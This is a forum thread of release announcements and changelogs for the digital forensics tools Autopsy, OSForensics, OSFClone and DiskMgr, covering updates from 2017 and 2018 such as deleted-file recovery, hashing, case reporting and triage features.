[close]

http://www.sleuthkit.org/autopsy/desc.php
Titel: Autopsy 4.4.0
Beitrag von: SiLæncer am 31 Mai, 2017, 05:30
Changelog

Keyword search regular expressions now work with spaces.
A sparse VHD file can be created when analyzing a local drive (USB) so that you don't need to acquire first.
Ingest filters allow you to run the ingest modules only a subset of files during triage
Ingest profiles allow you to pick an ingest filter and set of ingest modules to make it eaiser to preprogram for triage
User can edit keyword lists.
Import/export of interesting files set membership rules.
Fix resolution issue with high DPI systems
Updated Recent Activity ingest module to use RegRipper 2.8 plugins.
Ability to customize HTML report logo.
Assorted small enhancements and bug fixes.

[close]

http://www.sleuthkit.org/autopsy/desc.php
Titel: OSForensics 5.0.1000
Beitrag von: SiLæncer am 01 Juni, 2017, 09:14
Changelog

New PList Viewer
◦Added a new Plist viewer
◦Text foward/reverse search option.
◦For nodes that contain „data“, added quick hex preview popup dialog when field is single-clicked (double clicking will open a new file viewer window).
•NEW $UsnJrnl Viewer
◦Added support for loading $UsnJrnl files saved as a regular file (ie. not as $J alternate data stream)
◦Added support for $MFT file lookup to determine full path
◦Added support for searching for subtext
◦Added right-click menu options for viewing file, exporting records and adding records to case
◦Added progress bar when parsing USN records, loading $MFT file and searching for subtext
◦Improved loading speed by searching for records from the end of the file
◦Path is now determined using the Parent MFT# stored in the USN record, followed by the filename stored in the USN record.
◦ Paths that may not be correct are coloured in red. This occurs when the filename or the parent MFT# in the USN record does not match what is stored in the $MFT
•Analyze Shadow Volume
◦Results can now be exported in HTML and CSV format
◦Added button to export results to case
◦Added right-click menu for exporting results
•Case Manager
◦Added support for mounting file paths as a device in the case
◦Adding devices to case now supports adding local folders in addition to network paths. Renamed ‘Network Path (UNC)’ to ‘Folder / Network Path’
◦When adding an image file to case, the ‘Select partition’ dialog has been updated to reduce confusion.
◦Added option to export $UsnJrnl records to report
◦Fixed index OOB error when exporting deleted files to report
◦Added support for adding BitLocker-encrypted drives to case. The drive must have been previously added to the case.
◦Fixed error message when viewing the properties of a Case Device
◦Recent history items for case name, investigator, contact details etc are now saved to the config and will be reloaded when OSForensics is started.
•Compare Signature
◦Check if signature reports as version 3 but is actually 4 (two extra fields were added but internal version number of signature was not changed).
•Create / Verify Hash
◦Added secondary hash function to allow calculating 2 different hashes simultaneously
•Deleted Files Search
◦Added right-click menu to re-arrange columns in Details View
◦Added ‘Source’ and ‘File number’ columns to details view
◦Directory records found in $I30 slack space are now included in the results
◦Records found in $I30 attribute in deleted MFT directory records are now included in the results
◦Fixed bug with misreported quality when multiple streams exist for the deleted file
◦“Save and Open“ right-click options no longer prompt the user for the a location to save the file; it shall be saved automatically to the temp folder and immediately opened. The right-click options have also been renamed accordingly
◦When opening deleted files in the internal viewer, the initial tab that is displayed will correspond to the file extension
◦Fixed bug with saving deleted files to disk when the file fragments are greater than 64KB
◦Added *.msg to the search preset for e-mails
•Drive Imaging
◦Fixed error copying single files to logical image due to directories not being created
◦Fixed file size of single file not included when calculating VHD image size
◦When calculating VHD image size, the file size on disk is now used. This is to account for sparse/compressed files that occupy less disk space than its file size.
◦Fixed bug with drive list in ‘Create Image’ tab containing devices from previous case after switching cases
•Email Viewer
◦Fixed buffer overflow of ‘From’ field
◦Fixed heap corruption when opening .eml files with quoted printable encoded text
•File Indexer
and searching ◦New Zoom build with fixes for:
◾Fixed bug with indexing zero date as „23/04/2009 6:24:48“
◾Indexing „delivery time“ for PST emails. Only index „submit time“ if former is not available. Previously was only indexing submit time, which means Drafts/Deleted items would have no time in index but be inconsistent with EmailViewer, which would display a date/time.
◾Now supporting Win10 CompactOS compression (when used with the default XPRESS compression option). Viewing and indexing these files is now possible.
◦Fixed bug with Search Index -> Advanced settings’ Date/Time range not being applied.
◦On History tab, when choosing right-click menu’s „Display Search Results & Add to Case…“, it will now export the list of results to the case along with adding the corresponding files.
•File Name Search
◦Added right-click menu to re-arrange columns in Details View
◦Added *.msg to the search presets for e-mail
◦Fixed performance issue when searching with alternate stream criteria. Basic search criteria (eg. file name, attributes, etc.) should be checked before performing the much slower stream criteria check.
•File System Browser
◦Added checkboxes for performing operations on multiple items without having to continuously hold select/ctrl. Clicking on the ‘n item(s) checked’ link opens a menu with a list of operations to perform.
◦Fixed text not appearing in icon/list view
◦Improved responsiveness when changing directories
◦Fixed bug with calculating folder size on disk for non-NTFS file systems
◦Fixed deadlock when multiple threads are accessing mounted devices simultaneously
◦Added right-click menu to re-arrange columns in Details View
◦When calculating folder sizes, stream sizes are now included
◦Added error messages when performing certain operations on $I30 slack items
◦Deleted artificats recovered from $I30 slack space can now be displayed.
◦Files that have reparse points are now displayed in green
•Hash Sets
◦Fixed a NSRL has set import error that could occur when the manufacturer name was greater than 100 characters
•Internal Viewer / File and Hex Viewer
◦File Viewer tab, changed volume controls to trackbar + mute button
◦Added ‘IP address’ filter to Hex Viewer string extraction
◦When viewing buffers (eg. deleted files) in the „file viewer“ tab, the buffer shall first be saved to a temporary file and then loaded. Previously, a ‘Unsupported file format’ message is displayed.
◦Removed unnecessary saving of temporary files for file paths containing case devices
◦Extracting strings is now threaded so the window is no longer blocked. String extraction can also be cancelled half way.
◦Removed limit on the number of extracted strings
◦Added encryption, reparse point, sparse file, system compression attribute checkboxes
◦Added right-click menu option to save data to disk. This allows saving file streams and buffers (eg. deleted files) to a file.
◦Added warning text when attempting to view a non-file buffer that exceeds the maximum size (128MB for 64-bit, 16MB for 32-bit)
•Memory Viewer
◦Added right-click menu to re-arrange columns of the process list
◦Changed encoding of memory dump VW cfg file from UTF16-BE to UTF-8
◦Changed the extension for memory dummp files from .bin to .mem
◦Added tabs for ‘Live Analysis’ and ‘Static Analysis’. Previous view has been moved to ‘Live Analysis’ tab. ‘Static Analysis’ allows the user to launch ‘Volatility Workbench’ process with the specified memory dump file.
•Passwords
◦New updated password cracking library. Improved GPU acceleration allows for faster cracking. Double the speed in some cases.
◦Find Passwords & Keys: Added right-click menu to re-arrange columns
◦Find Passwords & Keys: Added checkboxes for performing operations on multiple items without having to continuously hold select/ctrl. Clicking on the ‘n item(s) checked’ link opens a menu with a list of operations to perform.
◦Fixed bug where Wifi profiles weren’t searching the correct location in some cases when “Live acquisition” was picked (could search incorrect drive letter)
◦Fixed bug where Wifi profiles might not search correct location in localised (non-english) version of windows
◦Fixed a crash that could occur when searching Wifi profiles
◦Fixed possible crash when getting system passwords
◦Added more info to display, client thread status, benchmark, password length and prefix.
•Prefetch Viewer
◦Fixed possible crash due to buffer overflow
•Raw Disk Viewer
◦Added a list of preset regular expressions combo box that can be used when performing a raw search
◦Improved performance of search window list view
◦Removed max search results limit in search window
◦Fixed synchronization issues potentially resulting in crash
•Recent Activity Viewer
◦Changed how the windows user directories are searched for so all operating system dependant locations (XP, Win7 etc) are searched now instead of searching the known location of the first one found. For example if an XP system contained a „Users“ folder in the root directory then it was previously only searching the (possibly empty) Users folder and then not searching the „Documents and Settings“ location.
◦Fixed a „missing column“ error for old versions of Firefox cookies
◦Made some changes when trying to repair a „dirty“ windows search database (eg from a system image of a currently running system) so that if the esentutl tool crashes OSF will attempt to run it again
◦Added P2P artifacts from BitTorrent and UTorrent resume.dat folder, also checks the User’s Download directory for .torrent extensions.
◦Fixed Bug with P2P Items not showing details on the File List Tab
◦Added Search queries artifacts for Ares Galaxy
◦Added Shareaza P2P Search Artifacts.
◦Added Emule P2P Artifacts
◦Added SABnzbd P2P Artifacts
•Report Templates
◦Combined ‘Drive Imaging’ and ‘Forensic Copy’ HTML template into a single ‘Forensic Imaging’ HTML template
•Start Window
◦Renamed “Website Passwords” to “Scan for Passwords/Keys”
◦Renamed “Removable Drive Preparation” to “Drive Preparation”
◦Added icon for launching ‘Volatility Workbench’ under ‘Viewers’ group
•System Information
◦Made some changes to the system information command dialogs, added columns to show „Live acquisition“ / „Drive acquisition“ / „Image acquisition“ differences of commands
•Web Browser
◦Fixed bug where saving the complete webpage was not working correctly
•Misc
◦Changed date/time format to 24-hour clock
◦Fixed crash when Exception filter is executed
◦Moved ‘Forensic Copy’ module to ‘Drive Imaging’ module as a new tab. Renamed ‘Drive Imaging’ to ‘Forensic Imaging’
◦Fixed ‘Forensic Copy’ and ‘Drive Imaging’ logs not appearing in generated report
◦Fixed some flickering issues when resizing
◦Updated File Name Search preset list to include Virtual Machine files
◦Fixed bug with EmailView and EmailViewer displaying 1/01/1601 when a 0 datetime value is given. Now reports „Unknown date“.
◦When selecting a directory via a popup dialog, if the entered path in the text box is valid, it will be returned. Otherwise, the directory selected in the tree view is returned.
◦Added template files for exporting $UsnJrnl records to report
◦Fixed bug with the initial directory not being set correctly in the select file dialog
◦When prompted to select a file, the last directory path is now used as the initial directory if not specified
◦Fixed bug in handling alternate data streams with multiple $DATA attributes
◦Added support for accessing bitlocker encrypted drives in raw form
◦Updated HTML Editor to show character count.
◦External Viewers (File, Registry, FS Browser, Email, Thumbcache, ESEDB, USNNRNL and Plist) will retain the size of their last viewer window closed for subsequent openings
◦Performance increase when opening registry files
◦Fixed several potential crash points when closing the OSF application while the progress window is still showing
◦Added encryption, reparse point, sparse file, system compression attribute checkboxes
◦Added right-click menu option to save data to disk. This allows saving file streams and buffers (eg. deleted files) to a file.
◦Added warning text when attempting to view a non-file buffer that exceeds the maximum size (128MB for 64-bit, 16MB for 32-bit)
◦Updated help file with $UsnJrnl Viewer section
◦Fixed a bug that may cause Temp Registry Files in the function call CreateTempRegFileIfNeeded() not be created when debugmode is enabled.

[close]

http://www.osforensics.com/
Titel: OSForensics 5.0 Build 1001
Beitrag von: SiLæncer am 05 Juni, 2017, 12:00
Changelog

File Indexer and searching:

Added a missing DLL (MSVCR100.DLL) to the installer that could prevent ZIP files from being indexed correctly

Internal Viewer - Hex View:

Fixed string extraction function failing to return correct offset due to using 32-bit variables

Memory Viewer:

Fixed an issue where the process refresh timer was running even when the memory viewer window was hidden.

Passwords - Windows Login:

Added right-click menu to tables

[close]

http://www.osforensics.com/
Titel: OSForensics 5.0.1002
Beitrag von: SiLæncer am 06 Juni, 2017, 12:24
Changelog

•Internal Viewer
◦Fixed a bug where attempting to open an archive (zip etc) file could result in a missing DLL message being displayed on older versions of Windows.
•File Name Search
◦Fixed a buffer overflow that could sometimes cause a crash when displaying file names longer than 512 characters in the „Current folder“ field. Crash can be appear randomly as field was only updated occasionally while a search was in progress.

[close]

http://www.osforensics.com/
Titel: OSForensics 5.1 Build 1000
Beitrag von: SiLæncer am 06 Juli, 2017, 09:15
Changelog

Case Manager:

Added ".mem" extension when selecting image file to add to case
Chain of Custody Report Template - Rearranged template fields, added signature field.
Generate Report - Allow option to generate Chain of Custody report along side Case Report.
Overhauled Chain of Custody reporting. Expanded the Edit Case dialog window with tabs to allow additional case data, such as Offense type, Legal Authority & Suspects Name to be entered.

Create Index:

Added '.qbb' (Quickbooks) file type to the list of 'Other supported file types' category. Note that only file name will be indexed.

Create Signature:

Deleted files can now be included in the signature from the config window. Hashing is also supported for deleted files (but not for $I30 slack entries)

Compare Signature:

File attribute string now includes custom attributes (eg. 'deleted', '$I30 slack entry')
File icon is now included in the comparison results
Signature info now includes whether deleted files were scanned or not

Deleted Files:

Fixed Bug where saving multiple files would fail to save files to destination.
File Carver - Unallocated Cluster code would not read from the disk when the cluster offsets did not reside on sector boundaries. File Carving initialization will check to see if start cluster offset is a factor of cluster size, if not, file carving will switch to raw carve mode.
File Carver - Addressed bug which might cause carving unallocated clusters to not to progress.

DirectAccess – NTFS:

Added buffer overflow check when decompressing CompactOS files
Improved performance of checking for valid $ATTR_FILENAME attribute when looking for $I30 slack entries
Improved performance of FindFirstDel/FirstNextDel functions
Fixed bug with not resetting the file pointer when detecting imageUSB image file. This could result in volume hashes returning the wrong value when verify the hash of a volume (a few bytes that the start of the file were not included in the hash calculation).

Email Viewer:

Fixed HTML/RTF message body not being searched

File Name Search:

Added config option to 'Search deleted files'. If enabled, deleted and $I30 slack files are included in the search results.
Deleted files are now shown in different text colour and with a deleted icon overlay in 'File List' view. Right click options for viewing files was also added.
Deleted files are now shown as a separate group in 'Timeline' view
Added more file details when exporting the file list to txt/html/csv file
Added support for adding/removing deleted files to/from case
Added support for looking up deleted files in hash set
Added support for saving deleted files to disk from File Name Search module.

File System Browser:

Fixed 'n item(s) checked' still appearing after changing the folder
Added right-click menu option to export list of checked files to Case
File times now include decimal precision
Removed checkboxes in 'File Select' dialog
'File Select' dialog window size is now saved
Fixed auto-scrolling when sorting items

Internal Viewer - Hex View:

Improved performance of string extraction by using parallel processing. Approximately a 60% speed improvement
Improved performance of filtering strings by using boyer-moore search & parallel processing. Can be more than twice as fast, depending on hardware
If using word list, included matched expression in status bar of selected string
When filtering the string list, the # of strings that have been processed is now displayed
Added option to save to .dic file for use with dictionary based password cracking
Moved filtering operation to thread due to length of operation. User may cancel the filtering operation at any time.
Changed preset filter combo box to a link which brings up a menu when clicked. The menu provides several preset filters, as well as an option to select a word list
Added 'Use RegEx' checkbox to allow user-specified regular expressions

MemViewer - Static Analysis:

'Memory dump file' filter now includes .bin, .img, .dmp extensions
Added 'View & Extract Strings' button to open the dump file in internal viewer in hex view

Thumbnail View:

Fixed text colouring for Deleted/$I30 slack/Reparse point files

Misc:

Updated help file
Improved performance of list classes by using multi reader single writer lock. Fixed some synchronization issues.
When selecting image files, the 'All Images' filter now shows all supported image files rather than all files

[close]

http://www.osforensics.com/
Titel: OSForensics 5.1.1001
Beitrag von: SiLæncer am 07 Juli, 2017, 12:21
Whats new:>>

Case Manager

Fixed bug when specifying a custom location for a case.

http://www.osforensics.com/
Titel: OSFClone 1.2.1000
Beitrag von: SiLæncer am 27 Juli, 2017, 21:00
(http://s26.postimg.org/pq2mi8nix/screenshot_1018.jpg)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advance Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to use quickly and efficiently their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

Whats new:>>

Added option to write acquired dd or ewf image back to a drive. Image must reside on root of partition.

http://osforensics.com/tools/create-disk-images.html
Titel: OSForensics 5.1.1002
Beitrag von: SiLæncer am 08 August, 2017, 11:00
Changelog

Add File To Case function
The copied files in the case folder should now have the same filetimes as the original source file.
Case Manager
Fixed Accessed & Attribute Modified file times not being stored in the OSFMeta file
Case meta item file, added two additional fields (where available): Last Access Date, MFT Modified Date
Deleted Files Search
Fixed changing of ‘Date filter’ combo box in Timeline view not updating the chart
File Indexer and searching
New Zoom builds fixed crash bug with indexing EML/MBOX file containing attachments of EML/MBOX files
Internal Viewer
Fixed info text for files that belong to the case
When opening a file added to a case, the original folder and file times are now displayed (obtained from the OSFMeta file). These attributes are highlighted in a different colour along with an information text.
For image files, size and file times have been removed
Internal Viewer – Hex View
Split IP address regular expression into IPv4, IPv6 standard notation, IPv6 standard + compressed notation
Recent Activity
Updated installer to include an alternate version of esentutl to use in the case of „Dirty shutdown (-550)“ errors for ESEDB databases (eg from Windows search, Edge) that could sometimes cause the esentutl version installed locally to crash leaving the files in an unreadable state
Misc
Updated help file with internal viewer changes

[close]

http://www.osforensics.com/
Titel: Autopsy 4.4.1
Beitrag von: SiLæncer am 12 August, 2017, 10:00
Changelog

Beta version of new central repository feature has been added for correlating artifacts across cases; results are displayed using an Interesting Artifacts branch of the Interesting Items tree and an Other Data Sources content viewer.
Results viewer (top right area of desktop application) sorts are persistent and can be applied to either the table viewer or the thumbnail viewer.
The View Source File in Directory context menu item now works correctly.
Tagged image files in the HTML report are now displayed full-size.
Case deletion is now done using a Case menu item and both single-user and general (not auto ingest) multi-user cases can be deleted.
Content viewers (bottom right area of desktop application) now resize correctly.
Some potential deadlocks during ingest have been eliminated.
Assorted performance improvements, enhancements, and bug fixes.

[close]

http://www.sleuthkit.org/autopsy/desc.php
Titel: DiskMgr 0.9
Beitrag von: SiLæncer am 15 August, 2017, 22:00
(https://s26.postimg.org/yhg6ooh3t/screenshot_1123.jpg)
DiskMgr provides a user-friendly way to change DISK attributes in a Windows Forensic Environment (WinFE).

DiskMgr has both 32 and 64-Bit portable executables and is only for advanced users who understand and need to change their disk attributes. You can set your disk attributes to Offline, Online, Read-Only, and Read-Write.

DiskMgr makes setting your disk attributes super simple, but again, it should only be used by advanced users.

Freeware

http://reboot.pro/files/file/573-diskmgr/
Titel: OSForensics 5.1.1003
Beitrag von: SiLæncer am 28 August, 2017, 09:19
Changelog

File Index
New Zoom indexer build, fixed bug that was failing to index particular .OST and .PST files with compression.
File Name Search
Fixed a crash which could occur in the hash set lookup function when the hash set being searched contained very long string lengths.
Thumbnail View, flags are now custom drawn to increase the speed when updating path flags, for example when doing hash matching.
Hash Lookup
Added support for ‘Modeless’ dialogs for hash lookup for multiple files. This allows other modules in OSF to be used simultenously with hashing in background.
Fixed dialog resizing screen corruption issues in the hashset lookup window
Reduced the frequency of update to the user interface when hash operation is running to improve speed. It looks slower, but is actually much much faster.
When performing a hash set lookup for multiple files, 4 threads and a larger block sizes for disk reads are now used in order to increase performance. For large hashsets, with a fast SSD, performance improved 5 fold.
Added a limit of 1000 file set matches returned for a single file hash lookup. So 1 file on disk can now not match more than 1000 applications. Previously a zero length file would match 500,000 applications in NSRL list.
Added a limit of 5 file set matches returned for multiple file hash lookups file set results a hash set lookup for a single file will return which improves speed dramatically when hash set or files being looked up contain matches in multiple files sets (eg when searching for file hashes in a set containing millions of records such as NSRL hash sets)
Added caching of 0 byte / empty (contains only 0’s) files to speed up multiple hash set lookups. Zero length files appear around 5000 times on a typical hard drive. So this can save 5000 slow database queries.
Hash Sets
Added a „Properties“ right click menu item to display a dialog with some information about the hash set (disk location, number of product types, file sets, files).
Password recovery
Fixed a CSV formatting error when using the Copy row(s) to clipboard function if an item contained a ‘,’ character
Recent Activity
Fixed a bug where shellbag information was not being retrieved correctly when using “Scan drive” C: instead of live acquisition.
Fixed a CSV formatting error when using the Copy row(s) to clipboard function if an item contained a ‘,’ character
Fixed a bug where the last connected date of a USB item could be different in Live search when compared to a C: search

[close]

http://www.osforensics.com/
Titel: OSForensics 5.2.1000
Beitrag von: SiLæncer am 10 Oktober, 2017, 09:09
Changelog

NEW Triage wizard Wizard launch icon on Start page. Huge amount of data can now be rapidly collected by inexperienced users with single click.
Customize workflow Now also removes icons from the Start page (and the menu)
It is possible to lock down the workflow with a password so inexperienced users can’t re-enable all the features so easily.
Case Manager Items added to a case can now be categorized into a type of Crime, this list can be customised by editing the “Categories.txt” file in the ProgramData folder.
On the “add to case” dialog when using the “Use same details for all” option if the title has not been changed by the user a special <Use item name> flag will be displayed. This will then be replaced by each item’s name when added to the case.
PDF reporting bug fix.
Fixed sorting by clicking on title in Case Management window.
Added new tag <!–OSF_CASE_CASEINFOTABLE–> to customisable reports for generating Case Info table. Only non-blank fields shall be outputted
File Index Fixed a buffer overflow bug due to illegally long filenames in ZIP files
Recent Activity Started sanitising the HTML output for some items when exporting to HTML so that HTML special characters (eg <>&) are safely encoded.
Thumbnail Viewer Now has a faster option to switch between the various thumbnail files found on drive via a drop down list.
Drive preparation 1 click drive preparation function. Can wipe, verify, format drive with 1 click. A log file is also now written to the drive recording the preparation steps.
Hash Set Lookup Added check if SHA256 hash is stored in the hash set. If not, SHA256 is not calculated. This saves a small amount of CPU time.
Email viewer A bug fix for parsing some rare corrupted PST flies
Misc Correction of various multi-threading bugs, which came to light when running a large number of tasks simultaneously. Registry access code wasn’t thread safe & could crash if multiple tasks were reading registry entries at same time, especially password recovery.
Caching of disk’s MFT into RAM didn’t work well with multiple threads. Solution was to enlarged cache slightly and unified it into a shared cache. Multiple threads should run significantly faster than before.
Some handles to various internal resources were not being free. Resulting in memory leaks and possible crashes.
Even larger cache sizes and more advanced cache lookup algorithm to speed up various operation that involve reading MFT (is a RAM usage / speed trade off). Slightly more RAM is used, but disk operations are faster. For example file name searches are now 33% faster.
Some help file updates
Fixed up the opening of the Help file to get the navigation menu showing again. The Edge browser in Win10 unexpectedly broke some of the help functions.
Fixed a crash in the 32bit version when trying to start a filename search

[close]

http://www.osforensics.com/
Titel: OSForensics 5.2.1001
Beitrag von: SiLæncer am 18 Oktober, 2017, 14:00
Changelog

Recent Activity

    Fixed a crash that could occur when adding a filter when something other than "All" was selected in the treeview

Triage wizard

    Added "Manually carve files in unallocated clusters" suggested action
    Added "Generate new HTML report" and "Generate new PDF report" suggested actions.
    Fixed SysInfo "# commands completed" not updated properly on completion
    Fixed wording of several "Suggested Actions"
    Fixed BitLocker detection results appearing in System Information results
    'Manually search' suggested actions now automatically start the corresponding search
    Auto-generated HTML/PDF reports are now saved in separate "Triage PDF Report" and "Triage HTML Report" folders respectively
    Fixed underline/cursor/text colour confusion for list view text that are not links

[close]

http://www.osforensics.com/
Titel: Autopsy 4.5.0
Beitrag von: SiLæncer am 27 Oktober, 2017, 14:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

Memory usage has been reduced to improve support for very large cases.
New central repository feature has been added that allows you to correlate between cases and track if an item was previously identified as being "bad" or notable.
Message attachments are not associated with the message (and not just the source file). These can be found in the data sources and messages parts of the tree.
Credit card number search has added logic to reduce false positives based on number lengths.
Virtual directory nodes in the tree view are distinguished in the Data Sources tree by the addition of a "V" to their icon. These are folders that Autopsy/TSK created.
A new version of the automated ingest dashboard has been added to allow insight into pending, running and completed automated ingest jobs in automated ingest Examiner mode.
All occurrences of "Known Bad" in the user interface have been changed to "Notable."
Assorted small enhancements and bug fixes are included.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 5.2.1002
Beitrag von: SiLæncer am 03 November, 2017, 09:09
Changelog

Deleted File Search Fixed a stack corruption crash
SQLite Browser Fixed issue where OSF wasn’t able to extract blob contents for sqlite tables created using WITHOUT ROWID.
Forensic Imaging Fixed error when attempting to image a locked Bitlocker-encrypted drive. Instead of opening the drive letter (eg. ‘C:’), the underlying physical disk (eg. \.PhysicalDrive0) is opened instead
File Index New Zoom indexer build with added support for indexing .sqlite, .sqlite2, .sqlite3 and and identifying SQLite files with no extensions
Misc Made some changes to how temporary files are created to make them thread safe (to prevent multi threading issues when using the triage function)

[close]

http://www.osforensics.com/
Titel: OSForensics 5.2.1003
Beitrag von: SiLæncer am 23 November, 2017, 20:00
Changelog

Browser Passwords Fixed a crash that could occur when there was more than 50 Firefox username/passwords
Disk Imaging Allow continuation of imaging after encountering too many bad blocks (1000).
Added extra check if the first read fails when verifying the image created.
System Information Fixed crash possible with getting printer info when system returns bad information.
Fixed a crash in some cases when getting the computer name from the registry
Misc Fixed bug where navigation bar icons were incorrect for items near the end/bottom.

[close]

http://www.osforensics.com/
Titel: OSForensics 5.2.1004
Beitrag von: SiLæncer am 14 Dezember, 2017, 19:00
Changelog

Case Report Added dll required by wkhtmltopdf.exe to installer to prevent an export to PDF error error seen on windows 8
Rainbow Tables Fixed crash occuring when cracking hashes from a pwdump txt file when secure case logger was enabled
Recent ACtivity Fixed a crash that could be caused by 0 length entries when processing Jump lists items
Triage Wizard Fixed a crash caused by trial limitations when running the triage wizard
Misc Improved how temp files are stored to make it more threadsafe (eg when running multiple tasks using the Triage Wizard)

[close]

http://www.osforensics.com/
Titel: OSForensics 5.2 Build 1005
Beitrag von: SiLæncer am 22 Februar, 2018, 09:13
Changelog

Disk test:

Fixed a crash when formatting as FAT32 fails.
Fixed an issue with formatting as FAT32 on small drives.

Deleted Files:

Fixed a crash that could occur in deleted file search when file carving is selected but the physical disk has been removed from the system
Fixed an uncaught exception error when loading MFT for some OSF devices.
Fix a Bug where raw whole disc carving was incorrectly returning progress, causing possible crash when accessing the list.
Fixed error box appearing when failing to read non-resident MFT attributes (eg. LCN is invalid as the MFT attribute has been overwritten). Instead, the error is logged and the search silently continues
When parsing $ATTRIBUTE_LIST, buffer is now properly allocated according to the size of the attribute. Previously, this caused an assert error to occur due to the buffer size being too small

Internal Viewer:

Fixed potential memory leak when generating video thumbnails
Fixed potential concurrency issues when loading videos

Mismatch File Search:

Fixed a bug with the CSV export dialog displaying a .HTML file extensions instead of .CSV

Password recovery:

Removed a "File not found" error when running the windows password search on a non system drive

System Information:

Fixed a possible crash when getting printer information

Triage Wizard:

Fixed an uncaught exception error that could occur when running a scan on a non system drive (eg D) and having only windows passwords selected.
Fixed a missing file error message that was displayed when running a scan on a non system drive (eg D) and having only windows passwords selected and 0 results were found

[close]

http://www.osforensics.com/
Titel: Autopsy 4.6.0
Beitrag von: SiLæncer am 23 Februar, 2018, 18:00
Changelog

New Features:

A new Message content viewer was added to make it easier to view email message contents.
A new Communications interface was added to make it easier to find messages and relationships.
Hash sets can be centrally stored and shared in the Central Repository.
New Encryption Detection module that will flag possibly encrypted files.
Can more easily run Autopsy from a USB drive and leave few traces on target system.
Tag definitions now have a "notable" property. The Central Repository uses this to mark files as notable.
Large slack files are now file typed.
The maximum number of Solr connections and ingest threads have increased.
Periodic keyword search will dynamically change based on how long queries are taking.
Users can change the amount of memory allocated to the application.
The amount of memory required for processing keyword hits has been reduced.
Layout of HTML reports has been modified make it easier to open.
"Databases" was added to File Type by Extension view.
Users can now enter more information about cases including examiner, organization, etc.
New dialog to open multi-user cases that allows for searching.
Auto ingest metrics are collected and displayed in dashboard.
Auto ingest module that extracts disk images from archive files.
Keyword search has been made more responsive to both search and ingest job cancellation.
Number of log files to keep before rollover is now configurable.
Preliminary changes to make Linux and OS X builds easier.

Bug Fixes:

Memory leaks and other issues revealed by fuzzing the SleuthKit have
Been fixed.
Memory issues caused by Tika are fixed (by upgrading to 1.17)
Assorted small enhancements and bug fixes are included.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 5.2 Build 1006
Beitrag von: SiLæncer am 26 Februar, 2018, 09:07
Changelog

Case Manager
Report Fix, if the background thread copying files for report didn't exit cleanly OSF may warn of background activity when quitting.
Case Details Dialog
Fixed bug that might cause case narrative text to be reset to default when editing case details.
Will prompt user to confirm cancelling changes when they edited case details fields and clicking cancel.
Case Export
Changed text on "Cancel" button to "Close" on the Generate Report Dialog since custom logos are saved to config once changed in the dialog.

[close]

http://www.osforensics.com/
Titel: OSForensics 5.2 Build 1007
Beitrag von: SiLæncer am 16 März, 2018, 09:10
Whats new:>>

Recent Activity:

Fixed an error that could display when a jumplist was finished being processed

Registry Viewer:

Fixed a crash that could occur when reading a registry file

http://www.osforensics.com/
Titel: OSFClone 1.3.1000
Beitrag von: SiLæncer am 06 April, 2018, 20:00
(https://i.postimg.cc/hG4zpJWz/screenshot-1643.png)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advance Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to use quickly and efficiently their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

Changelog

Changed Linux OS to Porteus V4.0 RC4
Fixed bug with Compute Checksum calculation when choosing SHA256 and SHA512 would actually be computing SHA1.
Updated dc3dd to 7.2.646
Updated libewf to 20171104 (included libsmdev-20171112)
Updated afflib to 3.7.16
Updated aimage to 3.2.5
Updated ddrescue to 1.23
HFS+ filesystem supported for read/write.

[close]

http://osforensics.com/tools/create-disk-images.html
Titel: Autopsy 4.7.0
Beitrag von: SiLæncer am 09 Mai, 2018, 21:30
Changelog

A graph visualization was added to the Communications tool to make it easier to find messages and relationships.
A new "Application" content viewer (lower right) that will contain file-type specific viewers (to reduce number of tabs).
New viewer for SQLite databases (in Application content viewer)
New viewer for binary PLists (in Appilcation content viewer)
L01 files can be imported as data sources.
Ingest filters can now use date range conditions for triage.
Passwords to open password protected archive files can be entered (by right clicking on the file).
Reports (e.g., RegRipper output) generated by ingest modules are now indexed for keyword search.
PhotoRec carving module can be configured to keep corrupted files.
Sector size can be specified for local drives and images when E01 is wrong or it is a raw image.
New data source processor in Experimental module that runs Volatility, adds the outputs as files, and parses the reports to provide INTERESTING_FILE artifacts.
Assorted small enhancements are included.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 6.0.4 Beta
Beitrag von: SiLæncer am 06 Juni, 2018, 20:00
Changelog

Case Management:

Added "Export case" button
Added a list of reports that have been generated (in case directory or last known export directory)
When creating/editing case, user can now specify whether or not USB write-block should be enabled. Whenever the USB write-block settings are changed, a warning is displayed to the user to detach/re-attach connected USB devices for the settings to take effect.
Changed list view to allow groups (devices, reports, files etc) to be collapsible
Added last access date to case management when case is loaded
Fixed error copying files with long file paths in when a report was created and the report contained deep / long paths.
Fixed a bug when creating a case report that was leaving a file handle open
Added support for encrypting PDF report
Added predefined offenses list to 'Offense' drop down list when creating/editing case
Case Details Dialog, fixed bug that might cause case narrative text to be reset to default when editing case details.
Case Details Dialog, will prompt user to confirm cancelling changes when they edited case details fields and clicking cancel.
Case Export, changed text on "Cancel" button to "Close" on the Generate Report Dialog since custom logos are saved to config once changed in the dialog.
Re-added "E-mail Delivery Time" to report and the associated timezone
